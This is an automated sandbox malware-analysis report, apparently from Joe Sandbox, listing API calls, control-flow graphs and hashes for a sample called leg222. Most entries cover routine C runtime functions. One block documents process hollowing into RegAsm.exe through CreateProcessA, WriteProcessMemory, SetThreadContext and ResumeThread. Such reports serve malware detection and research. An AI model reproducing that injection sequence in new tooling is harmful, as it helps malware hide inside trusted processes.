___scrt_uninitialize_crt LeaveCriticalSection 21959->21960 21961 abbd96 21960->21961 21961->21931 21962->21920 21963->21903 24227 aaf666 24228 ab352b ___scrt_uninitialize_crt 72 API calls 24227->24228 24229 aaf66e 24228->24229 24237 ab92ac 24229->24237 24231 aaf673 24232 ab9357 14 API calls 24231->24232 24233 aaf682 DeleteCriticalSection 24232->24233 24233->24231 24234 aaf69d 24233->24234 24235 ab8a3f ___free_lconv_mon 14 API calls 24234->24235 24236 aaf6a8 24235->24236 24238 ab92b8 ___scrt_is_nonwritable_in_current_image 24237->24238 24247 ab3011 EnterCriticalSection 24238->24247 24240 ab92c3 24241 ab932f 24240->24241 24244 ab9303 DeleteCriticalSection 24240->24244 24245 ab31f0 73 API calls 24240->24245 24248 ab934e 24241->24248 24246 ab8a3f ___free_lconv_mon 14 API calls 24244->24246 24245->24240 24246->24240 24247->24240 24251 ab3059 LeaveCriticalSection 24248->24251 24250 ab933b 24250->24231 24251->24250 24589 ab6fb9 24592 ab6c85 24589->24592 24593 ab6c91 ___scrt_is_nonwritable_in_current_image 24592->24593 24600 ab3011 EnterCriticalSection 24593->24600 24595 ab6cc9 24605 ab6ce7 24595->24605 24596 ab6c9b 24596->24595 24601 ac1bd4 24596->24601 24600->24596 24602 ac1bef 24601->24602 24603 ac1be2 __Getctype 24601->24603 24602->24596 24603->24602 24604 ac1907 __Getctype 14 API calls 24603->24604 24604->24602 24608 ab3059 LeaveCriticalSection 24605->24608 24607 ab6cd5 24608->24607 24646 ab978e 24647 ab97a9 24646->24647 24648 ab9799 24646->24648 24652 ab97af 24648->24652 24651 ab8a3f ___free_lconv_mon 14 API calls 24651->24647 24653 ab97ca 24652->24653 24654 ab97c4 24652->24654 24656 ab8a3f ___free_lconv_mon 14 API calls 24653->24656 24655 ab8a3f ___free_lconv_mon 14 API calls 24654->24655 24655->24653 24657 ab97d6 24656->24657 24658 ab8a3f ___free_lconv_mon 14 API calls 24657->24658 24659 ab97e1 24658->24659 24660 ab8a3f ___free_lconv_mon 14 API calls 24659->24660 24661 ab97ec 24660->24661 24662 ab8a3f ___free_lconv_mon 14 API calls 24661->24662 24663 ab97f7 24662->24663 24664 ab8a3f ___free_lconv_mon 14 API calls 24663->24664 24665 ab9802 24664->24665 24666 ab8a3f ___free_lconv_mon 14 API calls 24665->24666 24667 ab980d 24666->24667 24668 ab8a3f ___free_lconv_mon 14 API calls 24667->24668 24669 ab9818 24668->24669 24670 ab8a3f ___free_lconv_mon 14 API calls 24669->24670 24671 ab9823 24670->24671 24672 ab8a3f ___free_lconv_mon 14 API calls 24671->24672 24673 ab9831 24672->24673 24678 ab95db 24673->24678 24679 ab95e7 ___scrt_is_nonwritable_in_current_image 24678->24679 24694 ab3011 EnterCriticalSection 24679->24694 24681 ab961b 24695 ab963a 24681->24695 24684 ab95f1 24684->24681 24685 ab8a3f ___free_lconv_mon 14 API calls 24684->24685 24685->24681 24686 ab9646 24687 ab9652 ___scrt_is_nonwritable_in_current_image 24686->24687 24699 ab3011 EnterCriticalSection 24687->24699 24689 ab965c 24690 ab987c __Getctype 14 API calls 24689->24690 24691 ab966f 24690->24691 24700 ab968f 24691->24700 24694->24684 24698 ab3059 LeaveCriticalSection 24695->24698 24697 ab9628 24697->24686 24698->24697 24699->24689 24703 ab3059 LeaveCriticalSection 24700->24703 24702 ab967d 24702->24651 24703->24702 19700 5e018d 19703 5e01c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 19700->19703 19702 5e03a2 WriteProcessMemory 19704 5e03e7 19702->19704 19703->19702 19705 5e03ec WriteProcessMemory 19704->19705 19706 5e0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 19704->19706 19705->19704

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,005E00FF,005E00EF), ref: 005E02FC
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005E030F
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(00000114,00000000), ref: 005E032D
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(00000118,?,005E0143,00000004,00000000), ref: 005E0351
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000118,?,?,00003000,00000040), ref: 005E037C
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000118,00000000,?,?,00000000,?), ref: 005E03D4
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000118,00400000,?,?,00000000,?,00000028), ref: 005E041F
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000118,?,?,00000004,00000000), ref: 005E045D
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(00000114,005F0000), ref: 005E0499
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(00000114), ref: 005E04A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304256581.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_5e0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                          • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                          • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction ID: 53e12aec569a6f31d1b17e31c5d3f22da22a75ce9488bf355e4f1ebdad7c4cd8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7B1E57660028AAFDB60CF69CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA52CD
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA52E7
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5308
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5334
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5369
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA53A6
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA53F7
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA5416
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA542F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 3434717313-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 7325e82a394526fffbfb247ac9c0439fa2c3d86199f8a3580a9a2ed2b39a7c9c
                                                                                                                                                                                                                                          • Instruction ID: bce83795406be354fe4dc1465fc3c3412c6e1f03d2f05552bd5e38340fcfd9e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7325e82a394526fffbfb247ac9c0439fa2c3d86199f8a3580a9a2ed2b39a7c9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC41CE31A087408FC750DF24D990B5FB7F0AFD2760F05095DE8898B291DBB5E909CBA2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00AC9A6D
                                                                                                                                                                                                                                            • Part of subcall function 00AAA892: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 00AAA89E
                                                                                                                                                                                                                                            • Part of subcall function 00AAA892: GetExitCodeThread.KERNEL32(?,?), ref: 00AAA8B7
                                                                                                                                                                                                                                            • Part of subcall function 00AAA892: CloseHandle.KERNEL32(?), ref: 00AAA8C9
                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00AC9AAB
                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00AC9AB2
                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00AC9AB9
                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00AC9AC0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$Thread$CloseCodeCurrentExitHandleObjectSingleWait
                                                                                                                                                                                                                                          • String ID: Success created.$Success destroyed.
                                                                                                                                                                                                                                          • API String ID: 2210105531-4203135720
                                                                                                                                                                                                                                          • Opcode ID: 67b384cbdc8b302cf308cb40d0f497c1a8662b49958069476e1d1e91004968f3
                                                                                                                                                                                                                                          • Instruction ID: 212c50a880f7923b6c7d8adf759370050e81158ba34033a72e1890f7c4ef82c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67b384cbdc8b302cf308cb40d0f497c1a8662b49958069476e1d1e91004968f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64312D71A40701BAD7207BB48D07F5FB7A8EF06B90F104929F515AB2C2EB719500C3A5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 119 ab8c4f-ab8c5b 120 ab8ced-ab8cf0 119->120 121 ab8c60-ab8c71 120->121 122 ab8cf6 120->122 124 ab8c7e-ab8c97 LoadLibraryExW 121->124 125 ab8c73-ab8c76 121->125 123 ab8cf8-ab8cfc 122->123 128 ab8c99-ab8ca2 GetLastError 124->128 129 ab8cfd-ab8d0d 124->129 126 ab8c7c 125->126 127 ab8d16-ab8d18 125->127 131 ab8cea 126->131 127->123 132 ab8cdb-ab8ce8 128->132 133 ab8ca4-ab8cb6 call ab89a8 128->133 129->127 130 ab8d0f-ab8d10 FreeLibrary 129->130 130->127 131->120 132->131 133->132 136 ab8cb8-ab8cca call ab89a8 133->136 136->132 139 ab8ccc-ab8cd9 LoadLibraryExW 136->139 139->129 139->132
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,8B0E21E6,?,00AB8D5C,?,?,?,00000000), ref: 00AB8D10
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                          • Opcode ID: fb5a6916d5fdb88133eb8e1291aaf1fd40803841e21df7c66e3c70375fc3f350
                                                                                                                                                                                                                                          • Instruction ID: bec3162aa7af16fdfd67f45ab04ebed8c67d755fe4c00a531adb3b720220b79e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb5a6916d5fdb88133eb8e1291aaf1fd40803841e21df7c66e3c70375fc3f350
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621E7B5A02111ABDB219B69DC41EAA3B7CAF527B4F250120E915B72D2DF3CED01C6E1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 140 aaf87c-aaf887 141 aaf889-aaf89c call ab2fbd call ab2ebf 140->141 142 aaf89d-aaf8b0 call aaf82c 140->142 148 aaf8de 142->148 149 aaf8b2-aaf8cf CreateThread 142->149 150 aaf8e0-aaf8ec call aaf79e 148->150 152 aaf8ed-aaf8f2 149->152 153 aaf8d1-aaf8dd GetLastError call ab2f63 149->153 155 aaf8f9-aaf8fd 152->155 156 aaf8f4-aaf8f7 152->156 153->148 155->150 156->155
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(?,?,Function_0000F720,00000000,?,?), ref: 00AAF8C5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AAF8D1
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00AAF8D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2744730728-0
                                                                                                                                                                                                                                          • Opcode ID: ee94ecadfb84003f31c8d3c39ea8a909d0c1ab587695b5bf4c9717cfbfa7cfee
                                                                                                                                                                                                                                          • Instruction ID: 85866994f6eef194e1f37e8b2348b062fe6617a6cece065554060759586afe57
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee94ecadfb84003f31c8d3c39ea8a909d0c1ab587695b5bf4c9717cfbfa7cfee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC019A72500209AFDF199FE0DC06AEE7BA8EF05360F000069B80197190DB35DE10EBA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?,?,?,?), ref: 00AC9948
                                                                                                                                                                                                                                          • GetUpdateRgn.USER32(00000000,00000000,00000000), ref: 00AC9959
                                                                                                                                                                                                                                            • Part of subcall function 00AC9000: OffsetRect.USER32(00000000,00000000,00000000), ref: 00AC910C
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,00AC98B0,00000000,00000000,00000000), ref: 00AC99EF
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 00AC99F8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocCreateObjectOffsetRectSingleThreadUpdateVirtualWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3157016804-0
                                                                                                                                                                                                                                          • Opcode ID: 15e156fc27a2efbc09fa1dca328b7fe52202326b6198d9f9d6c8555d5841947b
                                                                                                                                                                                                                                          • Instruction ID: a4662a8e6863e54fad7123d4e67909a709c5a3bb47ffb05aaadd7e94525263bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15e156fc27a2efbc09fa1dca328b7fe52202326b6198d9f9d6c8555d5841947b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA310971E01208ABD704DFB8ED86FAEB7B1AF45300F10422DF9016B3D2EB749A458795

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00AD3A10,0000000C), ref: 00AAF733
                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00AAF73A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                                                                                                                          • Opcode ID: 731ca46a298e6d794f4f1cf42045ba85f03b10a847b40104a47c49853b7fc46e
                                                                                                                                                                                                                                          • Instruction ID: 04e68b1a2ae172b172f72e4cc18682a57242e1108b20c84e05f561a62e9b863b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731ca46a298e6d794f4f1cf42045ba85f03b10a847b40104a47c49853b7fc46e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0C271A00208AFDB04FFF0C94AE6E7B78FF11700F100559F106972A2CB355901CB62

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 262 ab98c7-ab98db GetLastError 263 ab98dd-ab98e5 call ab8f6b 262->263 264 ab98f7-ab9901 call ab8faa 262->264 269 ab98f2 263->269 270 ab98e7-ab98f0 263->270 271 ab9903-ab9905 264->271 272 ab9907-ab990f call ab89e2 264->272 269->264 273 ab996c-ab9975 SetLastError 270->273 271->273 275 ab9914-ab991a 272->275 276 ab997c-ab9981 call ab3087 273->276 277 ab9977-ab997b 273->277 278 ab992d-ab993b call ab8faa 275->278 279 ab991c-ab992b call ab8faa 275->279 287 ab993d-ab994b call ab8faa 278->287 288 ab9954-ab9969 call ab96f5 call ab8a3f 278->288 286 ab994c-ab9952 call ab8a3f 279->286 296 ab996b 286->296 287->286 288->296 296->273
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: f29ffa3e99e4cde6e53c9fe806692bf585f502ae58056e9cf1a83ce1493c23bc
                                                                                                                                                                                                                                          • Instruction ID: f760e2e1a55864de2879243fc60d8e60c8738e172b5359f849c7bab26c79ba5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f29ffa3e99e4cde6e53c9fe806692bf585f502ae58056e9cf1a83ce1493c23bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9011A3316066126EAB5067F89DC6EFB365CAF017A4B10022DF225950B3EF684C0AD120

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 298 ab8d1a-ab8d42 299 ab8d48-ab8d4a 298->299 300 ab8d44-ab8d46 298->300 302 ab8d4c-ab8d4e 299->302 303 ab8d50-ab8d57 call ab8c4f 299->303 301 ab8d99-ab8d9c 300->301 302->301 305 ab8d5c-ab8d60 303->305 306 ab8d7f-ab8d96 305->306 307 ab8d62-ab8d70 GetProcAddress 305->307 309 ab8d98 306->309 307->306 308 ab8d72-ab8d7d call ab617b 307->308 308->309 309->301
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4ce939ee51b5409c0992f966bb8bb52abb03060b6e10729d45f483b51c94f731
                                                                                                                                                                                                                                          • Instruction ID: b2091fed6f179959e40688fb93c5846b8d14600433fe22b64f46c8cd27104f8d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ce939ee51b5409c0992f966bb8bb52abb03060b6e10729d45f483b51c94f731
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01B5777006156F9B26CF7DEC40ADA33AEABD57607688122F905DB196EF38D801C790

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 312 ab89e2-ab89ed 313 ab89fb-ab8a01 312->313 314 ab89ef-ab89f9 312->314 316 ab8a1a-ab8a2b RtlAllocateHeap 313->316 317 ab8a03-ab8a04 313->317 314->313 315 ab8a2f-ab8a3a call ab2fbd 314->315 323 ab8a3c-ab8a3e 315->323 319 ab8a2d 316->319 320 ab8a06-ab8a0d call ab8319 316->320 317->316 319->323 320->315 325 ab8a0f-ab8a18 call ab8364 320->325 325->315 325->316
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,00AB9914,00000001,00000364,?,00000005,000000FF,?,00AAF745,00AD3A10,0000000C), ref: 00AB8A23
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 2b09bdc624519e5824a42e326a7f27a69cebc40f203d97266c5c02762a50c845
                                                                                                                                                                                                                                          • Instruction ID: 541fb453fb373037b325f5ca87eb065236f2cafbf08b500c2416161ecd0f520d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b09bdc624519e5824a42e326a7f27a69cebc40f203d97266c5c02762a50c845
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0BB315142249BDB316F6E9C05BEA375CAF41BE0B168117A804AA182CF28DC00D6E1
                                                                                                                                                                                                                                          APIs
